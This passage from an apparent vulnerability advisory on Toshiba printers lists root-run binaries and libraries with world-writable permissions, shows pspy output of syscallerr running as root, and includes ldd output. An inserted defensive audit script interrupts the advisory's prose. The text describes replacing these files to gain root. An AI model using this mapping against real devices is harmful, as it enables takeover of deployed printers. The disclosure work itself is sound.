\/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_faxreceive<br \/>-rwxrwxrwx 1 root root 608397 Dec 6 04:11<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_faxtransmit<br \/>-rwxrwxrwx 1 root root 561916 Dec 6 04:38<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_ipfaxreceive<br \/>-rwxrwxrwx 1 root root 594505 Dec 6 04:38<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_ipfaxtransmit<br \/>-rwxrwxrwx 1 root root 572434 Dec 6 04:11<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_print<br \/>-rwxrwxrwx 1 root root 556369 Dec 6 04:10<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_rip<br \/>-rwxrwxrwx 1 root root 557372 Dec 6 04:10<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_scan<br \/>-rwxrwxrwx 1 root root 2191621 Dec 6 02:13<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alAddressBookMgr<br \/>-rwxrwxrwx 1 root root 939045 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alCloning<br \/>-rwxrwxrwx 1 root root 1019576 Dec 6 02:20<br
\/>\/home\/SYSROM_SRC\/build\/release\/bin\/alExportImport<br \/>-rwxrwxrwx 1 root root 1354094 Dec 6 02:15<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alLogRetriever<br \/>-rwxrwxrwx 1 root root 734343 Dec 6 02:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alLogmanager<br \/>-rwxrwxrwx 1 root root 241886 Dec 6 02:24<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alPanelStartLEDHandler<br \/>-rwxrwxrwx 1 root root 2282226 Dec 6 02:24<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alPanelUIMessageHandler<br \/>-rwxrwxrwx 1 root root 211250 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alServiceUIPlugin<br \/>-rwxrwxrwx 1 root root 6104526 Dec 6 03:51<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alUiFrameWork<br \/>-rwxrwxrwx 1 root root 673942 Dec 6 02:20<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alViewPlugin<br \/>-rwxrwxrwx 1 root root 2896387 Dec 6 02:12<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alaccountmgr<br \/>-rwxrwxrwx 1 root root 2917038 Dec 6 02:26<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alappmanager<br \/>-rwxrwxrwx 1 root root 1055271 Dec 6 01:49<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alboserver<br \/>-rwxrwxrwx 1 root root 322981 Dec 6 02:08<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alcbamanager<br \/>-rwxrwxrwx 1 root root 2528851 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aldevauthmgmtplugin<br \/>-rwxrwxrwx 1 root root 4386856 Dec 6 03:30<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aldeviceconfigplugin<br \/>-rwxrwxrwx 1 root root 4300169 Dec 6 03:25<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aldeviceserviceplugin<br \/>-rwxrwxrwx 1 root root 1915456 Dec 6 02:14<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aleFilingmgr<br \/>-rwxrwxrwx 1 root root 580229 Dec 6 01:50<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alfilestoragem<br \/>-rwxrwxrwx 1 root root 509900 Dec 6 02:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/algrpmgr<br \/>-rwxrwxrwx 1 root root 441641 Dec 6 
02:24<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhddalertmgr<br \/>-rwxrwxrwx 1 root root 696894 Dec 6 02:24<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhddbackuprestore<br \/>-rwxrwxrwx 1 root root 829606 Dec 6 02:16<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhomedatamgr<br \/>-rwxrwxrwx 1 root root 606628 Dec 6 03:28<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alifaxreceive<br \/>-rwxrwxrwx 1 root root 162074 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alintegritychkmgr<br \/>-rwxrwxrwx 1 root root 4414769 Dec 6 02:08<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aljobcontroller<br \/>-rwxrwxrwx 1 root root 2832921 Dec 6 02:15<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aljobtemplatemgr<br \/>-rwxrwxrwx 1 root root 434559 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/allicensemgmt<br \/>-rwxrwxrwx 1 root root 1258130 Dec 6 02:15<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/almailboxapplication<br \/>-rwxrwxrwx 1 root root 4674491 Dec 6 03:32<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/almaintenanceplugin<br \/>-rwxrwxrwx 1 root root 2339610 Dec 6 02:25<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alnfcplugin<br \/>-rwxrwxrwx 1 root root 743285 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alnsm<br \/>-rwxrwxrwx 1 root root 740586 Dec 6 03:45<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alpanel<br \/>-rwxrwxrwx 1 root root 292667 Dec 6 02:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alpdlfiltermanager<br \/>-rwxrwxrwx 1 root root 387749 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alpresentationresourcemgr<br \/>-rwxrwxrwx 1 root root 1314049 Dec 6 01:52<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alprintmn<br \/>-rwxrwxrwx 1 root root 2360596 Dec 6 03:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alreportmanager<br \/>-rwxrwxrwx 1 root root 595735 Dec 6 03:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alreportsmsgr<br \/>-rwxrwxrwx 1 root root 1367678 Dec 6 
02:19<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alrestrictionmode<br \/>-rwxrwxrwx 1 root root 1253012 Dec 6 02:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alrolemgr<br \/>-rwxrwxrwx 1 root root 2272202 Dec 6 02:18<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alsecurityconfiguration<br \/>-rwxrwxrwx 1 root root 972621 Dec 6 03:52<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alsharedprintDp<br \/>-rwxrwxrwx 1 root root 1060254 Dec 6 02:13<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alsoftwareupdateclient<br \/>-rwxrwxrwx 1 root root 1711439 Dec 6 02:25<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alulm<br \/>-rwxrwxrwx 1 root root 612467 Dec 6 02:18<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alusbmscapplication<br \/>-rwxrwxrwx 1 root root 3759736 Dec 6 02:17<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aluserAuthMgr<br \/>-rwxrwxrwx 1 root root 2874311 Dec 6 02:20<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alusermgr<br \/>-rwxrwxrwx 1 root root 899734 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alwsdiscovery<br \/>-rwxrwxrwx 1 root root 809391 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alwsmex<br \/>-rwxrwxrwx 1 root root 3782642 Dec 6 01:55<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alwsprint<br \/>-rwxrwxrwx 1 root root 4271522 Dec 6 01:56<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alwsscanner<br \/>-rwxrwxrwx 1 root root 355919 Dec 6 03:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/armn<br \/>-rwxrwxrwx 1 root root 18113 Dec 6 01:42<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/cipollproc<br \/>-rwxrwxrwx 1 root root 71587 Dec 6 01:42<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/ciprioritymanager<br \/>-rwxrwxrwx 1 root root 445362 Dec 6 01:42<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/cischeduler<br \/>-rwxrwxrwx 1 root root 532898 Dec 6 01:42<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/cissm<br \/>-rwxrwxrwx 1 root root 508004 Dec 6 01:48<br 
\/>\/home\/SYSROM_SRC\/build\/release\/bin\/cisystemresourcemanager<br \/>-rwxrwxrwx 1 root root 501163 Dec 6 04:16<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/cpe<br \/>-rwxrwxrwx 1 root root 1016124 Dec 6 04:39<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/de_ipfax<br \/>-rwxrwxrwx 1 root root 303779 Dec 6 04:16<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/dem<br \/>-rwxrwxrwx 1 root root 622110 Dec 6 04:16<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/dim<br \/>-rwxrwxrwx 1 root root 12229927 Dec 6 04:44<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/ebx_dl<br \/>-rwxrwxrwx 1 root root 1649127 Dec 6 04:02<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/informationservice<br \/>-rwxrwxrwx 1 root root 1257189 Dec 6 04:01<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/notificationservice<br \/>-rwxrwxrwx 1 root root 426167 Dec 6 04:14<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/pipeMN<br \/>-rwxrwxrwx 1 root root 269419 Dec 6 04:02<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/sim<br \/>-rwxrwxrwx 1 root root 258577 Dec 6 04:02<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/sljobmanagement<br \/>-rwxrwxrwx 1 root root 32089 Mar 14 16:28<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/ssdktimestamp<br \/>-rwxrwxrwx 1 root root 5986687 Dec 6 04:07<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/wfpc<br \/>-rwxrwxrwx 1 root root 78627 Dec 6 02:00 \/home\/SYSROM_SRC\/bin\/alllmnr<br \/>-rwxrwxrwx 1 root root 68223 Dec 6 01:57<br \/>\/home\/SYSROM_SRC\/bin\/dnsValidateDaemon<br \/>-rwxrwxrwx 1 root root 104184 Dec 6 01:48<br \/>\/home\/SYSROM_SRC\/bin\/eBXDebugLogUtility<br \/>-rwxrwxrwx 1 root root 76674 Dec 6 02:01 \/home\/SYSROM_SRC\/bin\/ipv6_daemon<br \/>-rwxrwxrwx 1 root root 28318 Dec 6 01:40 \/home\/SYSROM_SRC\/bin\/mapper<br \/>-rwxrwxrwx 1 root root 167219 Dec 6 01:48 \/home\/SYSROM_SRC\/bin\/syscallerr<br \/>-rwxrwxrwx 1 root root 316382 Dec 6 02:03<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aleSCL<br \/>-rwxrwxrwx 1 root root 21142 Dec 6 02:01<br 
\/>\/home\/SYSROM_SRC\/build\/release\/bin\/alftpprintd<br \/>-rwxrwxrwx 1 root root 243145 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhp9100<br \/>-rwxrwxrwx 1 root root 84257 Dec 6 01:56<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/allld2d<br \/>-rwxrwxrwx 1 root root 270934 Dec 6 01:53<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/allprng<br \/>-rwxrwxrwx 1 root root 389522 Dec 6 02:02<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alnetefiRemoteifsr<br \/>-rwxrwxrwx 1 root root 15176259 Dec 6 03:39<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alstage2<br \/>-rwxrwxrwx 1 root root 126466 Dec 6 02:01<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alusbPrint<br \/>-rwxrwxrwx 1 root root 1419229 Dec 6 02:01<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/faxmilter<br \/>-rwxrwxrwx 1 root root 21638 Dec 6 03:28<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/snmp_watchdog<br \/>-rwxrwxrwx 1 apache messagebus 656546 Dec 6 01:34 \/usr\/local\/ebx\/bin\/httpd<br \/>-rwxrwxrwx 1 apache messagebus 665612 Dec 6 01:34<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<\/p>\n<p>The previous command lists symbolic links that we can analyze, and we<br \/>can confirm they are also vulnerable due to insecure permissions:<\/p>\n<p>lrwxrwxrwx 1 root root 35 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/bin\/dibbler-client -&gt;<br \/>..\/..\/thirdparty\/bin\/dibbler-client<br \/>lrwxrwxrwx 1 root root 26 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alipp -&gt; ..\/..\/thirdparty\/bin\/alipp<br \/>lrwxrwxrwx 1 root root 39 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/mDNSResponderPosix -&gt;<br \/>..\/..\/thirdparty\/bin\/mDNSResponderPosix<br \/>lrwxrwxrwx 1 root root 25 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/nqcs -&gt; ..\/..\/thirdparty\/bin\/nqcs<br \/>lrwxrwxrwx 1 root root 25 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/nqnd -&gt; ..\/..\/thirdparty\/bin\/nqnd<br \/>lrwxrwxrwx 1 root root 
30 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/slapd -&gt;<br \/>..\/..\/thirdparty\/libexec\/slapd<br \/>lrwxrwxrwx 1 root root 27 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/snmpd -&gt;<br \/>..\/..\/thirdparty\/sbin\/snmpd<br \/>lrwxrwxrwx 1 root root 27 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/vsftpd -&gt;<br \/>..\/..\/thirdparty\/bin\/vsftpd<br \/>lrwxrwxrwx 1 root root 27 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/python -&gt;<br \/>..\/..\/thirdparty\/bin\/python<\/p>\n<p>bash-4.1# for i in dibbler-client alipp mDNSResponderPosix nqcs<br \/>nqnd vsftpd python; do ls -la<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/$i;done<br \/>-rwxrwxrwx 1 root root 11339780 Dec 6 01:38<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/dibbler-client<br \/>-rwxrwxrwx 1 apache messagebus 653763 Dec 6 01:40<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/alipp<br \/>-rwxrwxrwx 1 root root 429709 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/mDNSResponderPosix<br \/>-rwxrwxrwx 1 apache messagebus 1342015 Dec 6 01:35<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/nqcs<br \/>-rwxrwxrwx 1 apache messagebus 501752 Dec 6 01:35<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/nqnd<br \/>-rwxrwxrwx 1 root root 232030 Dec 6 01:34<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/vsftpd<br \/>lrwxrwxrwx 1 root root 7 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python -&gt; python3<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/libexec\/slapd<br \/>-rwxrwxrwx 1 root root 1709140 Dec 6 01:34<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/libexec\/slapd<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/snmpd<br \/>-rwxrwxrwx 1 apache messagebus 41801 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/snmpd<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/bin\/python3<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:27<br 
\/>\/home\/SYSROM_SRC\/build\/release\/bin\/python3 -&gt;<br \/>..\/..\/thirdparty\/bin\/python3<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3<br \/>lrwxrwxrwx 1 root root 9 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3 -&gt; python3.5<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3.5<br \/>-rwxrwxrwx 1 root root 20997 Dec 6 01:28<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3.5<br \/>bash-4.1#<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>The programs can be replaced by malicious programs by any local or<br \/>remote attacker.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure permissions for libraries<\/p>\n<p>Some vendor-specific programs are running inside Toshiba printers.<br \/>These programs run as root and use code from libraries that have<br \/>insecure permissions (777) allowing an attacker to replace these<br \/>libraries with malicious ones. 
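<\/p>
<p>The audit described in the previous section for programs, and here for the libraries they load, can be done in a single pass. The following POSIX shell script is an added example; it is not part of the original advisory and not Toshiba code. Instead of passing the `ps` command column through `which`, which misses programs started as `.\/name` from some working directory, it reads each process's executable from `\/proc\/PID\/exe` and every file-backed mapping from `\/proc\/PID\/maps` (so the LD_PRELOAD libraries are covered too), resolves symbolic links, and reports every file whose mode has the other-write bit set, together with its mode and owner. It assumes a Linux `\/proc` and the `readlink -f` and `stat -c` options of GNU coreutils or busybox; whether the printer's bash-4.1 environment ships exactly these is an assumption.<\/p>

```shell
#!/bin/sh
# Added example (not from the advisory, not vendor code): audit the
# executables and shared libraries of running processes for world-writable
# permissions. Assumes Linux /proc plus GNU/busybox `readlink -f` and `stat -c`.

# check_path FILE
#   Resolves symlinks first (the advisory's /home/SYSROM_SRC/bin links are
#   lrwxrwxrwx; the 777 problem is on their targets), then prints
#   "WRITABLE <mode> <owner> <resolved path>" and returns 0 if any user can
#   write the file; prints nothing and returns 1 otherwise.
check_path() {
    real=$(readlink -f "$1" 2>/dev/null) || real=$1
    [ -f "$real" ] || return 1
    # find -perm -002 matches when the "other" write bit is set,
    # whatever the remaining bits are (777, 666, 646, ...).
    if find "$real" -prune -perm -002 2>/dev/null | grep -q .; then
        printf 'WRITABLE %s %s %s\n' \
            "$(stat -c '%a' "$real")" "$(stat -c '%U' "$real")" "$real"
        return 0
    fi
    return 1
}

# audit_paths
#   Reads one path per line on stdin, resolves each one, de-duplicates the
#   resolved targets and reports the world-writable ones.
audit_paths() {
    while IFS= read -r p; do
        readlink -f "$p" 2>/dev/null || printf '%s\n' "$p"
    done | sort -u | while IFS= read -r real; do
        check_path "$real" || true
    done
}

# live_paths
#   For every process: its executable (/proc/PID/exe) and every file-backed
#   mapping in /proc/PID/maps, i.e. the shared libraries actually loaded,
#   LD_PRELOAD ones included. Run as root to see all processes.
live_paths() {
    for d in /proc/[0-9]*; do
        exe=$(readlink "$d/exe" 2>/dev/null) || continue
        printf '%s\n' "$exe"
        # field 6 of a maps line is the backing file when it starts with /
        awk '$6 ~ /^\// { print $6 }' "$d/maps" 2>/dev/null
    done
}

# Typical use on the device:  live_paths | audit_paths
```

<p>Owner matters as well as mode: a binary owned by a low-privileged account (`\/usr\/local\/ebx\/bin\/httpd` above is owned by apache:messagebus) can still be replaced by anyone who obtains that account, even after the other-write bit is cleared, which is why the report prints the owner next to the mode. The usage line at the end of the script is the one to run on the device as root.<\/p>
<p>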
This Local Privilege Escalation can also be<br \/>exploited as a Remote Code Execution by uploading a malicious library<br \/>through the Pre-authenticated Remote Code Execution as root or apache<br \/>and multiple Local Privilege Escalations vulnerability.<\/p>\n<p>For example, the `\/home\/SYSROM_SRC\/bin\/syscallerr` program is executed<br \/>regularly as root.<\/p>\n<p>### Example with `\/home\/SYSROM_SRC\/bin\/syscallerr`:<\/p>\n<p>Output of `pspy32`, showing `\/home\/SYSROM_SRC\/bin\/syscallerr` being<br \/>executed regularly as root (UID=0):<\/p>\n<p>2023\/05\/27 16:13:35 CMD: UID=0 PID=31370 | sh -c du -cb<br \/>\/work\/log\/corefiles\/core.* 2&gt; \/dev\/null | grep total | awk '{print<br \/>$1}'<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31373 | sh -c du -cb<br \/>\/work\/log\/corefiles\/core.* 2&gt; \/dev\/null | grep total | awk '{print<br \/>$1}'<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31372 | grep total<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31371 | sh -c du -cb<br \/>\/work\/log\/corefiles\/core.* 2&gt; \/dev\/null | grep total | awk '{print<br \/>$1}'<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31374 |<br \/>\/home\/SYSROM_SRC\/bin\/syscallerr<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31376 | awk {print}<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31375 |<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31377 | sh -c ps -e | grep ebx_dl<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31379 | grep ebx_dl<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31378 | ps -e<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31380 |<br \/>\/home\/SYSROM_SRC\/bin\/syscallerr<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31383 | sh -c ps -e |<br \/>grep ebx_dl | awk '{print $5}'<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31382 |<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31381 | ps -e<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31384 | sh -c ps -e | grep cissm<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31386 | grep cissm<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31385 | ps -e<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31387 | sh -c dd<br \/>if=\/dev\/mtdblock1 of=\/ramdisk\/FROM_SERIAL &gt; \/dev\/null 2&gt;&amp;1<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31388 | dd<br \/>if=\/dev\/mtdblock1 of=\/ramdisk\/FROM_SERIAL<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31389 | sh -c ps -e | grep ebx_dl<br \/>2023\/05\/27 16:13:35 CMD: UID=0 PID=31391 | grep ebx_dl<\/p>\n<p>Analyzing this program shows the shared libraries it loads; their code<br \/>is executed as root.<\/p>\n<p>The two shared libraries already identified as vulnerable earlier in<br \/>this advisory are injected through LD_PRELOAD:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/al\/libGetNameInfoInterface.so`<br \/>&#8211; &#8211; `\/ramdisk\/al\/libGetAddtInfoInterface.so`<\/p>\n<p>The remaining libraries loaded by the program can be listed with `ldd`:<\/p>\n<p>bash-4.1# ldd \/home\/SYSROM_SRC\/bin\/syscallerr<br \/>linux-gate.so.1 =&gt; (0x777c0000)<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so (0x777b1000)<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so (0x777a0000)<br \/>libpthread.so.0 =&gt; \/lib\/libpthread.so.0 (0x77780000)<br \/>libsqlite3.so.0 =&gt; \/usr\/lib\/libsqlite3.so.0 (0x4be4c000)<br \/>libciindexeddb.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libciindexeddb.so (0x77729000)<br \/>libsyscallerr.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libsyscallerr.so (0x77720000)<br \/>libcios.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so (0x776ad000)<br \/>libatawrapper.so.0 =&gt; \/mfp\/lib\/libatawrapper.so.0 (0x7768b000)<br \/>libmfpcommonwrapper.so.0 =&gt;<br \/>\/mfp\/lib\/libmfpcommonwrapper.so.0 (0x77682000)<br \/>libcrypto.so.1.0.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcrypto.so.1.0.0 (0x77420000)<br \/>libstdc++.so.6 =&gt; \/usr\/lib\/libstdc++.so.6 (0x4c04f000)<br \/>libgcc_s.so.1 =&gt; \/lib\/libgcc_s.so.1 (0x4c14b000)<br \/>libintlc.so.5 =&gt; \/usr\/lib\/libintlc.so.5 (0x773c3000)<br
\/>libsvml.so =&gt; \/mfp\/lib\/libsvml.so (0x76ba9000)<br \/>libc.so.6 =&gt; \/lib\/libc.so.6 (0x4bc67000)<br \/>libdl.so.2 =&gt; \/lib\/libdl.so.2 (0x4bdaf000)<br \/>libllmnrclient.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so (0x76b95000)<br \/>\/lib\/ld-linux.so.2 (0x4bc47000)<br \/>libsqlite.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libsqlite.so.0 (0x76b35000)<br \/>libcpanel.so.0 =&gt; \/mfp\/lib\/libcpanel.so.0 (0x76b0e000)<br \/>libcimsg.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so (0x76b02000)<br \/>libcissmclient.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcissmclient.so (0x76ae8000)<br \/>libacl.so.1 =&gt; \/lib\/libacl.so.1 (0x4bdd7000)<br \/>librt.so.1 =&gt; \/lib\/librt.so.1 (0x4be15000)<br \/>libm.so.6 =&gt; \/lib\/libm.so.6 (0x76abf000)<br \/>libssdk.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0 (0x75f1e000)<br \/>libcihdb.so =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcihdb.so (0x75e56000)<br \/>libattr.so.1 =&gt; \/lib\/libattr.so.1 (0x4bdd0000)<br \/>libpam.so.0 =&gt; \/lib\/libpam.so.0 (0x75e4a000)<br \/>libldap-2.4.so.2 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libldap-2.4.so.2 (0x75e12000)<br \/>libssl.so.1.0.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssl.so.1.0.0 (0x75da6000)<br \/>libk5crypto.so.3 =&gt; \/usr\/lib\/libk5crypto.so.3 (0x75d84000)<br \/>libresolv.so.2 =&gt; \/lib\/libresolv.so.2 (0x4c164000)<br \/>libext2fs.so.2 =&gt; \/usr\/lib\/libext2fs.so.2 (0x75d5a000)<br \/>libuuid.so.1 =&gt; \/usr\/lib\/libuuid.so.1 (0x4be0f000)<br \/>libkrb5support.so.0 =&gt; \/usr\/lib\/libkrb5support.so.0 (0x75d53000)<br \/>libkrb5.so.25 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libkrb5.so.25 (0x75ce2000)<br \/>libgssapi.so.2 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libgssapi.so.2 (0x75cae000)<br \/>libCryptolib.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libCryptolib.so.0 
(0x75c2b000)<br \/>libirng.so =&gt; \/usr\/lib\/libirng.so (0x75c22000)<br \/>libcilkrts.so.5 =&gt; \/usr\/lib\/libcilkrts.so.5 (0x75bee000)<br \/>libexpat.so.1 =&gt; \/usr\/lib\/libexpat.so.1 (0x4c403000)<br \/>libcrypt.so.1 =&gt; \/lib\/libcrypt.so.1 (0x75bbc000)<br \/>liblber-2.4.so.2 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/liblber-2.4.so.2 (0x75bb0000)<br \/>libsasl2.so.2 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libsasl2.so.2 (0x75b8c000)<br \/>libcom_err.so.2 =&gt; \/usr\/lib\/libcom_err.so.2 (0x4bdee000)<br \/>libhx509.so.5 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libhx509.so.5 (0x75b4b000)<br \/>libheimsqlite.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libheimsqlite.so.0 (0x75ad7000)<br \/>libhcrypto.so.4 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libhcrypto.so.4 (0x75aa4000)<br \/>libasn1.so.8 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libasn1.so.8 (0x75a02000)<br \/>libwind.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libwind.so.0 (0x759da000)<br \/>libcom_err.so.1 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcom_err.so.1 (0x759d6000)<br \/>libroken.so.18 =&gt;<br 